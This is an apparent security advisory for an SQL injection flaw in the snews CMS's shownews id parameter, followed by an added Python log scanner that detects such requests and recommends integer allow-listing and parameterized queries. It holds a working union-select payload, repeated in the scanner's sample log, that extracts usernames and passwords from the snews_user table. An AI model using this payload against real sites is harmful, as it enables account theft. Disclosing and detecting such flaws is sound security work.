CMS snews SQL Injection Vulnerability
Published on March 14th, 2013
Summary
Credit:
Details
Vulnerable Systems:
* CMS snews
SQL PoC:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
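Detection example (added here, not part of the original advisory or of the snews code base): a log scanner that flags `act=shownews` requests whose `id` is not a plain integer, treating SQL comments as whitespace so that `union/**/select` is still recognised. It assumes combined-format access logs and integer article ids; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Inline SQL comments (/**/, or an unterminated trailing /*) used in place of spaces.
COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
KEYWORDS = re.compile(r"\b(union|select|from|where|concat|char)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_id(raw_id):
    """Return 'ok', 'sqli' or 'non_numeric' for a shownews id value."""
    value = unquote(raw_id).strip()           # also undoes double encoding
    if re.fullmatch(r"[0-9]+", value):        # assumption: ids are plain integers
        return "ok"
    normalized = COMMENT.sub(" ", value)      # union/**/select -> union select
    return "sqli" if KEYWORDS.search(normalized) else "non_numeric"

def scan(lines):
    """Return (line_number, verdict) for each suspicious shownews request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        query = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith("/snews.php") or query.get("act") != ["shownews"]:
            continue
        for raw_id in query.get("id", []):
            verdict = classify_id(raw_id)
            if verdict != "ok":
                findings.append((number, verdict))
    return findings

# Constructed sample log lines; line 2 carries the example request from this advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2013:10:00:01 +0000] "GET /snews/snews.php?act=shownews&id=23 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Jan/2013:10:00:07 +0000] "GET /snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* HTTP/1.1" 200 911',
    '192.0.2.10 - - [15/Jan/2013:10:00:09 +0000] "GET /snews/snews.php?act=shownews&id=abc HTTP/1.1" 200 300',
    '192.0.2.10 - - [15/Jan/2013:10:00:12 +0000] "GET /snews/index.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

The same digits-only check in `classify_id` is the allow-list a handler would apply to `id` before it reaches a query, alongside parameterized statements.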
Disclosure Timeline:
Published: 2013-01-15